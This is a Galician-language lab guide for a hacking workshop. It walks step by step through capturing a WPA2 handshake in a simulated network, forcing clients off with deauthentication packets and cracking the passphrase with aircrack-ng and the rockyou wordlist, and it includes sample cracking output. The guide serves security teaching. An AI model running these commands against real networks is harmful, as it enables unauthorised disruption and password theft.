Ir ao contido

Guía de Práctica 1.1: Auditoría WPA2-PSK

Baseada na práctica 1-Taller-HE-Practica-WiFi-1.pdf

1. Preparación do Escenario (Terminal 1)

Arranca o laboratorio para despregar o AP lexítimo (EMPRESA-XYZ) e o cliente vítima.

sudo wifilabctl up psk
sudo wifilabctl status

2. Recoñecemento e Modo Monitor (Terminal 1)

Pon a túa tarxeta Wi-Fi de ataque (wlan2) en modo monitor.

sudo airmon-ng start wlan2
sudo airodump-ng wlan2mon
Anota o BSSID do AP obxectivo (EMPRESA-XYZ) e a Canle (6).

3. Captura do Handshake (Terminal 1)

Inicia a captura especificando a canle e o BSSID.

# Cambia <BSSID> polo valor real atopado
Ctrl+C
sudo airodump-ng -c 6 --bssid <BSSID> -w captura_psk wlan2mon
#Espera a ver como o cliente(wlan1) está autenticado neste BSSID (AP Lexítimo)

4. Ataque de Deautenticación (Terminal 2)

Nunha NOVA terminal, envía paquetes de deautenticación para forzar ao cliente a reconectarse usando a interface global wlan3.

sudo aireplay-ng -0 5 -a <BSSID_AP> -c <MAC_CLIENTE> wlan2mon
Nota: Tamén podes usar wlan3 se a pos en monitor.

Volve á Terminal 1. Deberías ver [ WPA handshake: ... ] na esquina superior dereita. Xa podes parar a captura (Ctrl+C).

Verificación de Desconexión (Opcional)

Se queres verificar que a vítima realmente se desconectou, podes mirar o seu log:

grep CTRL-EVENT-DISCONNECTED /home/kali/wifiLab/run/psk/wpa_supplicant.log

5. Cracking con Rockyou (Terminal 1)

Agora imos crackear o handshake capturado (captura_psk-01.cap).

Paso 1: Preparar o dicionario Tes dúas opcións para obter o ficheiro rockyou.txt descomprimido:

  • Opción A (Rápida):
    sudo gunzip -c /usr/share/wordlists/rockyou.txt.gz | sudo tee  /usr/share/wordlists/rockyou.txt > /dev/null
    
  • Opción B (Ferramenta Kali):
    wordlists -h
    y  # Pulsa 'y' para descomprimir
    cd ~
    

Paso 2: Lanzar o ataque

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt captura_psk-01.cap

Se o ataque ten éxito, verás: KEY FOUND! [ spongebob19 ]

                               Aircrack-ng 1.7

      [00:01:12] 236268/14344392 keys tested (3309.75 k/s)

      Time left: 1 hour, 11 minutes, 2 seconds                   1.65%

                          KEY FOUND! [ spongebob19 ]


      Master Key     : 00 35 42 60 BF F4 F0 DC 57 FA 6D 2C FF 97 F0 34
                       A2 F0 A5 7F EA 29 83 79 19 35 57 80 1A 63 40 EF

      Transient Key  : 14 6B 26 7D 3C 0B E5 A2 FA F8 28 33 3D D4 93 34
                       1D 53 CE E2 B9 F0 27 50 97 6A 92 88 33 B1 A3 65
                       97 BF 57 C4 FF E4 64 A8 19 AF F2 5D A1 40 61 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : 81 68 F8 1A BA 97 69 B5 A3 22 08 87 FD DA 1C 47

6. Limpeza

Ao rematar, apaga o escenario.

sudo wifilabctl reset